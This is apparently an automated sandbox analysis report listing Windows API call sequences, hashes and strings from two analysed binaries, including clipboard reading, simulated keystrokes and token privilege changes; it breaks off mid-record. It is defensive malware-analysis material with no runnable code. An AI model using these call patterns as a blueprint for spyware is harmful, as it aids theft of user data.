                                                                            • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                            • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00402100
                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                            • String ID:
                                                                            • API String ID: 1599320355-0
                                                                            • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                            • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                            APIs
                                                                              • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                            • String ID: Version
                                                                            • API String ID: 512980652-315105994
                                                                            • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                            • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                            • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                            • String ID:
                                                                            • API String ID: 2883127279-0
                                                                            • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                            • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                            • String ID: !N~
                                                                            • API String ID: 623250636-529124213
                                                                            • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                            • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                            • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405C48
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                            • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3509786178-2769509956
                                                                            • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                            • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                            • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                            • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0052D208
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000,?,?,?), ref: 0052D249
                                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0,?,?,?), ref: 0052D28E
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0052D2B8
                                                                            • SendMessageW.USER32 ref: 0052D2E1
                                                                            • _wcsncpy.LIBCMT ref: 0052D359
                                                                            • GetKeyState.USER32(00000011,?,?,?), ref: 0052D37A
                                                                            • GetKeyState.USER32(00000009), ref: 0052D387
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0052D39D
                                                                            • GetKeyState.USER32(00000010), ref: 0052D3A7
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000,?,?,?), ref: 0052D3D0
                                                                            • SendMessageW.USER32 ref: 0052D3F7
                                                                            • SendMessageW.USER32(?,00001030,?,0052B9BA,?,?,00000000,?,?,?,?,?,?), ref: 0052D4FD
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0052D513
                                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0052D526
                                                                            • SetCapture.USER32(?), ref: 0052D52F
                                                                            • ClientToScreen.USER32(?,?,?,?,00000001,@GUI_DRAGID), ref: 0052D594
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0052D5A1
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0052D5BB
                                                                            • ReleaseCapture.USER32(?,?,?), ref: 0052D5C6
                                                                            • GetCursorPos.USER32(?,?,00000001,?,?,?), ref: 0052D600
                                                                            • ScreenToClient.USER32(?,?), ref: 0052D60D
                                                                            • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0052D669
                                                                            • SendMessageW.USER32 ref: 0052D697
                                                                            • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0052D6D4
                                                                            • SendMessageW.USER32 ref: 0052D703
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0052D724
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0052D733
                                                                            • GetCursorPos.USER32(?), ref: 0052D753
                                                                            • ScreenToClient.USER32(?,?), ref: 0052D760
                                                                            • GetParent.USER32(?,?), ref: 0052D780
                                                                            • SendMessageW.USER32(?,00001012,00000000,?,?), ref: 0052D7E9
                                                                            • SendMessageW.USER32 ref: 0052D81A
                                                                            • ClientToScreen.USER32(?,?), ref: 0052D878
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0052D8A8
                                                                            • SendMessageW.USER32(?,00001111,00000000,?,?), ref: 0052D8D2
                                                                            • SendMessageW.USER32 ref: 0052D8F5
                                                                            • ClientToScreen.USER32(?,?), ref: 0052D947
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0052D97B
                                                                              • Part of subcall function 004A29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1AE0,?,?,?,?,?,?,004A1D8F,?,?,?), ref: 004A29BC
                                                                            • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?), ref: 0052DA17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 3977979337-4164748364
                                                                            • Opcode ID: 113c09e077079299b2518824aad2bd3c0c87f235f55557b0b16967c69381764f
                                                                            • Instruction ID: bfab1f73212922c873604b11ec27ba10d5777518f4276c70fecff2837a50a513
                                                                            • Opcode Fuzzy Hash: 113c09e077079299b2518824aad2bd3c0c87f235f55557b0b16967c69381764f
                                                                            • Instruction Fuzzy Hash: 2242CD30204351AFD725CF28D858BAABFF5FF9A314F140A19F695872E0C7719858DBA2
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 004B5EE2
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000,?), ref: 004F10D7
                                                                            • IsIconic.USER32(?,?), ref: 004F10E0
                                                                            • ShowWindow.USER32(?,00000009), ref: 004F10ED
                                                                            • SetForegroundWindow.USER32(?), ref: 004F10F7
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004F110D
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004F1114
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F1120
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1131
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 004F1139
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004F1141
                                                                            • SetForegroundWindow.USER32(?), ref: 004F1144
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 004F1159
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004F1164
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 004F116E
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004F1173
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,00000000,00000000), ref: 004F117C
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004F1181
                                                                            • MapVirtualKeyW.USER32(00000012,00000000,00000002,00000000), ref: 004F118B
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004F1190
                                                                            • SetForegroundWindow.USER32(?), ref: 004F1193
                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 004F11BA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: 9cbe31932c098db9bd0f864910c18d751196a00be8751868eb8ebf40dfaef1cd
                                                                            • Instruction ID: dd717a2b533c73dc1dbe46e5aedea7ff88b0550532ae3b7d9dc42f15efbb5da5
                                                                            • Opcode Fuzzy Hash: 9cbe31932c098db9bd0f864910c18d751196a00be8751868eb8ebf40dfaef1cd
                                                                            • Instruction Fuzzy Hash: EB316271A4031CBFEB216B619C4AF7F3E6CEB54B50F104016FB04AA2E1CAB45951EEA5
                                                                            APIs
                                                                              • Part of subcall function 004F9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
                                                                              • Part of subcall function 004F9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
                                                                              • Part of subcall function 004F9399: GetLastError.KERNEL32 ref: 004F941D
                                                                            • _memset.LIBCMT ref: 004F8F71
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004F8FC3
                                                                            • CloseHandle.KERNEL32(?), ref: 004F8FD4
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000,?,?,?,00000001,?,?), ref: 004F8FEB
                                                                            • GetProcessWindowStation.USER32 ref: 004F9004
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004F900E
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004F9028
                                                                              • Part of subcall function 004F8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F8F27), ref: 004F8DFE
                                                                              • Part of subcall function 004F8DE9: CloseHandle.KERNEL32(?,?,004F8F27), ref: 004F8E10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 2063423040-1027155976
                                                                            • Opcode ID: 631c4ffbdfe15afab5f9805307e7a6b09a62b6610f6fe57af98a7d8cea62080f
                                                                            • Instruction ID: dd6ee244520c8728730a2f572600f69697d51f4f03e72746345c0db3b2b4e6ad
                                                                            • Opcode Fuzzy Hash: 631c4ffbdfe15afab5f9805307e7a6b09a62b6610f6fe57af98a7d8cea62080f
                                                                            • Instruction Fuzzy Hash: 6D814C7190020DBFEF119FA4CE49AFF7B79EF04304F14412AFA10A62A1D7398E199B64
                                                                            APIs
                                                                            • OpenClipboard.USER32(00530980), ref: 0051465C
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0051466A
                                                                            • GetClipboardData.USER32(0000000D), ref: 00514672
                                                                            • CloseClipboard.USER32 ref: 0051467E
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0051469A
                                                                            • CloseClipboard.USER32 ref: 005146A4
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005146B9
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 005146C6
                                                                            • GetClipboardData.USER32(00000001), ref: 005146CE
                                                                            • GlobalLock.KERNEL32(00000000), ref: 005146DB
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0051470F
                                                                            • CloseClipboard.USER32(00000001,00000000), ref: 0051481F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                            • String ID:
                                                                            • API String ID: 3222323430-0
                                                                            • Opcode ID: 8abe59dd7db2774bba4e06ffd5b8e77365f04d31b4a045a3b2d56a3d78a73b87
                                                                            • Instruction ID: 4415b7a58aae2720ef24c0efd4626d4d3224982136af3aaae466447d6ddacd02
